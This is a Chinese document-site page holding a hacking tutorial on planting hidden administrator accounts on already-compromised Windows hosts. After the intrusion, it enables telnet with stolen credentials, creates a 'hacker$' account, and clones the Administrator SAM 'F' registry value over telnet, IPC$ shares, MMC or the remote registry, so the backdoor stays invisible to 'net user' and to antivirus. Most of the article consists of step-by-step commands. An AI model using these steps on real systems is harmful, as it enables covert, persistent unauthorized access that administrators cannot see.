




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、安全學(xué)習(xí):隱藏超級(jí)用戶創(chuàng)建全接觸 成功入侵達(dá)到目的之后,是不是想再做的點(diǎn)什么?哦!得多留個(gè)心眼,留下個(gè)后門什么的?可后門木馬程序容易被查殺,還是創(chuàng)建一個(gè)隱藏的超級(jí)用戶比較安全,在學(xué)習(xí)借鑒的基礎(chǔ),經(jīng)過反復(fù)研究實(shí)踐,總結(jié)出了如下如下幾種創(chuàng)建隱藏超級(jí)用戶的方法。一、利用帳戶克隆工具來創(chuàng)建Clone Administrator(CA.exe),利用這個(gè)工具可以將Administrator的帳號(hào)克隆為一個(gè)指定的普通帳號(hào)(此普通帳號(hào)必須已經(jīng)存在)??寺〉玫降膸ぬ?hào)具有和系統(tǒng)內(nèi)置的Administrator同樣的設(shè)置,并且用NET命令或者用戶管理器也發(fā)現(xiàn)不了其權(quán)限已經(jīng)被提升,是一個(gè)不錯(cuò)的ROOT K
2、IT?,F(xiàn)在,我們就來看看如何利用帳戶克隆工具在肉雞上創(chuàng)建隱藏的超級(jí)用戶。利用流光、SuperScan等進(jìn)行掃描,假設(shè)已經(jīng)掃描到一遠(yuǎn)程主機(jī)的Administrator帳戶,其密碼為123。我們可以使用DameWare Mini Remote Control(簡(jiǎn)稱DMRC),在圖形界面(GUI)中來遠(yuǎn)程控制遠(yuǎn)程主機(jī)。也可以使用OpenTelnet.exe工具來開啟遠(yuǎn)程主機(jī)的TELNET服務(wù),其命令格式為:OpenTelnet.exe server username password NTLMAuthor telnetport,使用命令:opentelnet 192.XX.XX.2 Administ
3、rator "123" 0 99,呵呵,沒想這么成功容易就開啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶及密碼,成功獲取一SHELL。 首先想辦法查看一下有哪些用戶被細(xì)心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會(huì)將guest禁用,當(dāng)然也會(huì)禁用其他用戶。在圖形界面下,非常容易識(shí)別,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個(gè)紅叉。但在命令行狀態(tài)下,只能使用命令:“net user 用戶名”一個(gè)一個(gè)來查看用戶是否被禁用。如果懶得這樣麻煩,可自行建立一個(gè)新的帳戶,命令為:“Net user hacker$ youko
4、u /add”,然后使用命令:“Net user hacker$ /active:no”來停用此帳戶。 斷開與遠(yuǎn)程主機(jī)的連接,用小榕的超級(jí)用戶克隆程序CA.exe,將被禁用的用戶hacker$克隆成超級(jí)用戶,命令為:CA.EXE 192.XX.XX.2 Administrator 123 hacker$ youkou,成功! 這時(shí),hacker$就成為了超級(jí)用戶,并有具有和Administrator同樣的設(shè)置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca 192.XX.XX.2 administrator 123。 看到這一行返回信息沒有?“hacker$ AS SA
5、ME AS Administrator”,說明hacker$帳戶和Administrator相同,克隆成功。二、圖形界面建隱藏超級(jí)用戶恐怕我們最熟悉的就是在圖形界面下進(jìn)行操作了,這對(duì)于在本地計(jì)算機(jī)、3389終端服務(wù)肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級(jí)用戶 再好不過了。大家知道嗎?Windows 2000中有兩個(gè)注冊(cè)表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實(shí)為一個(gè)程序,修改鍵值的權(quán)限時(shí)在右鍵快捷菜單中選擇“權(quán)限”來修改。對(duì)Regedit.exe我想大家都很熟悉,但卻不能對(duì)注冊(cè)表的鍵進(jìn)行權(quán)限設(shè)置,而R
6、egedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ?cè)表的項(xiàng)鍵設(shè)置權(quán)限。Windows NT/2000/XP的帳戶信息都在注冊(cè)表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統(tǒng)用戶SYSTEM外,其他用戶都沒有權(quán)限查看到其中的信息,因此首先得用Regedt32.exe對(duì)“HKEY_LOCAL_MACHINESAMSAM”鍵設(shè)置為“完全控制”權(quán)限。這樣就可以對(duì)SAM鍵內(nèi)的信息進(jìn)行讀寫操作。首先在肉雞中創(chuàng)建一個(gè)新的帳戶hacker$,可以在帳戶管理器中建立,也可以使用命令:net user hacker$ 123 /add 來創(chuàng)建。然后通過“開始”菜單中的“運(yùn)行”,輸入regedt32
7、.exe,點(diǎn)擊“確定”后就打開了注冊(cè)表編輯器。依次展開子鍵HKEY_LOCAL_MACHINESAMSAM,用鼠標(biāo)右鍵單擊,在彈出的快捷菜單中選擇“權(quán)限”項(xiàng)。 在出現(xiàn)的“SAM 權(quán)限”對(duì)話窗口中,點(diǎn)擊“添加”將我登錄時(shí)的帳戶添加到“組或用戶名稱”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權(quán)限功能區(qū)設(shè)置權(quán)限為“完全控制”。 小提示:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會(huì)帶來一系列不必要的問題。等隱藏超級(jí)用戶建好以后,再來這里將你添加的帳戶刪除即可。如果還是不能展開子鍵,請(qǐng)關(guān)閉后重新打開,如果是Win
8、dows 2000的機(jī)器,請(qǐng)關(guān)閉這個(gè)注冊(cè)表編輯器,重新打開“regedit.exe”。展開子鍵:HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameshacker$,在其右側(cè)窗口中發(fā)現(xiàn)其默認(rèn)值為0x3F1。 下面將hacker$鍵、hacker$對(duì)應(yīng)的項(xiàng)000003F1以及administrator所對(duì)應(yīng)的項(xiàng)000001F4導(dǎo)出為hacker.reg、3EE.reg和1f4.reg,退出注冊(cè)表編輯器。用記事本分別打開這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”
9、的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除,最后再將hacker.reg導(dǎo)入注冊(cè)表即可?,F(xiàn)在,隱藏的超級(jí)用戶hacker$已經(jīng)建好了。打開regedt32.exe,把HKEY_LOCAL_MACHINESAMSAM鍵權(quán)限改回原來的樣子(只要?jiǎng)h除添加的帳戶administrator即可)。注意:隱藏的超級(jí)用戶建好后,就能在帳戶管理器看不到hacker$這個(gè)用戶,在命令行用“net user”命令也看不到,但是超級(jí)用戶建立以后,就不能再改密碼了,如果用net user命令來改h
10、acker$的密碼的話,那么在帳戶管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶了,而且不能刪除。三、命令行建立隱藏超級(jí)用戶首先通過使用OpenTelnet.exe工具來開啟遠(yuǎn)程主機(jī)的TELNET服務(wù),然后TELNET遠(yuǎn)程登陸得到一個(gè)shell,創(chuàng)建一個(gè)新的帳戶,命令為:net user hacker$ youkou /add,然后就來導(dǎo)出注冊(cè)表項(xiàng)HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers,運(yùn)行命令:regedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers,其中/e 是regedi
11、t.exe的參數(shù),在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers這個(gè)鍵的一定要以“”結(jié)尾。 斷開TELNET連接,建立IPC會(huì)話:net use 192.XX.XX.2ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機(jī)上用記事本打開進(jìn)行編輯命令為:copy 192.XX.XX.2D$hacker.reg,用記事本編輯,將超級(jí)用戶對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”的值(hacker$對(duì)應(yīng)的項(xiàng)在不同的機(jī)
12、器而不同),編輯好后再上傳:copy hacker.reg 192.XX.XX.2D$hacker1.reg 。再TELNET到遠(yuǎn)程主機(jī),使用命令net user hacker$ /del刪除hacker$帳戶,然后把hacker.reg導(dǎo)入,命令為:regedit.exe /s hacker.reg,其中參數(shù)/s表示以安靜模式導(dǎo)入。這樣就成功創(chuàng)建了一個(gè)隱藏的超級(jí)用戶。四、連接遠(yuǎn)程肉雞注冊(cè)表創(chuàng)建還有一個(gè)比較簡(jiǎn)單方便的辦法,就是通過控制臺(tái)以及注冊(cè)表編輯器“文件”菜單中的“連接網(wǎng)絡(luò)注冊(cè)表”功能來完成隱藏超級(jí)用戶的創(chuàng)建。通過“開始”菜單中的“運(yùn)行”,輸入MMC,回車后即打開了控制臺(tái),打開“文件”菜單
13、中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現(xiàn)的對(duì)話框中點(diǎn)擊“添加”按鈕,在出現(xiàn)的“添加獨(dú)立管理單元”對(duì)話框中的列表中選擇“本地用戶和組”。 單擊“添加”即彈出“選擇目標(biāo)機(jī)器”對(duì)話框,選中“另一臺(tái)計(jì)算機(jī)”,在其后輸入遠(yuǎn)程計(jì)算機(jī)的IP地址,點(diǎn)擊“完成”。 一路關(guān)閉返回至控制臺(tái)窗口,我們就可對(duì)遠(yuǎn)程計(jì)算機(jī)進(jìn)行組和用戶的管理了,在右側(cè)窗口空白處右擊,在彈出的快捷選擇“新用戶”建立一帳戶hacker$吧!我們知道,regedit.exe、regedt32.exe都有連接網(wǎng)絡(luò)注冊(cè)表的功能,我們可以用regedt32.exe來為遠(yuǎn)程主機(jī)的注冊(cè)表項(xiàng)設(shè)置權(quán)限,用regedit.exe來編輯遠(yuǎn)程注冊(cè)表。導(dǎo)出相應(yīng)注冊(cè)項(xiàng),然后進(jìn)行編輯修改(同上面介紹相似)。 現(xiàn)在在“控制臺(tái)”中刪除剛建立的帳戶hacker$,然后關(guān)閉。然后在注冊(cè)表編輯器中通過“文件”菜單中的“導(dǎo)入”功能將上面導(dǎo)出的文件導(dǎo)入即可。如果遠(yuǎn)程主機(jī)沒有
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年元宇宙社交平臺(tái)虛擬社交場(chǎng)景構(gòu)建與用戶體驗(yàn)研究
- 2025年智慧物流技術(shù)應(yīng)用對(duì)倉(cāng)儲(chǔ)管理創(chuàng)新與變革的影響報(bào)告
- 2025年醫(yī)院電子病歷系統(tǒng)優(yōu)化提升醫(yī)療信息化建設(shè)效益報(bào)告
- 消費(fèi)與零售2025年寵物用品市場(chǎng)深度研究報(bào)告001
- 2025年醫(yī)藥行業(yè)CRO模式國(guó)際化戰(zhàn)略與本土化管理研究報(bào)告
- 家居新零售:2025年線上線下融合模式創(chuàng)新市場(chǎng)趨勢(shì)分析報(bào)告
- 2025年醫(yī)藥企業(yè)研發(fā)外包(CRO)模式下的質(zhì)量控制與監(jiān)管報(bào)告
- 2025年醫(yī)藥企業(yè)供應(yīng)鏈管理與成本控制報(bào)告001
- 社區(qū)團(tuán)購(gòu)平臺(tái)用戶流失預(yù)警系統(tǒng)構(gòu)建與留存策略報(bào)告001
- 工業(yè)互聯(lián)網(wǎng)平臺(tái)霧計(jì)算協(xié)同機(jī)制在虛擬現(xiàn)實(shí)增強(qiáng)現(xiàn)實(shí)中的創(chuàng)新應(yīng)用報(bào)告
- 病房床頭卡模板
- 消殺記錄臺(tái)賬
- 2022年西雙版納傣族自治州景洪教師進(jìn)城考試筆試題庫(kù)及答案解析
- 公路改建工程邊施工邊通車安全專項(xiàng)施工方案
- 施工總平面圖布置圖及說明
- 道路交通安全法律法規(guī)知識(shí)測(cè)試題
- 國(guó)際籃聯(lián)記錄表
- 大學(xué)生親社會(huì)行為量表(前測(cè))問卷正式版
- 煤礦培訓(xùn):自救器課件
- 空心玻璃微珠項(xiàng)目資金申請(qǐng)報(bào)告寫作模板+
- 藥品管理學(xué)概論(藥品管理學(xué))
評(píng)論
0/150
提交評(píng)論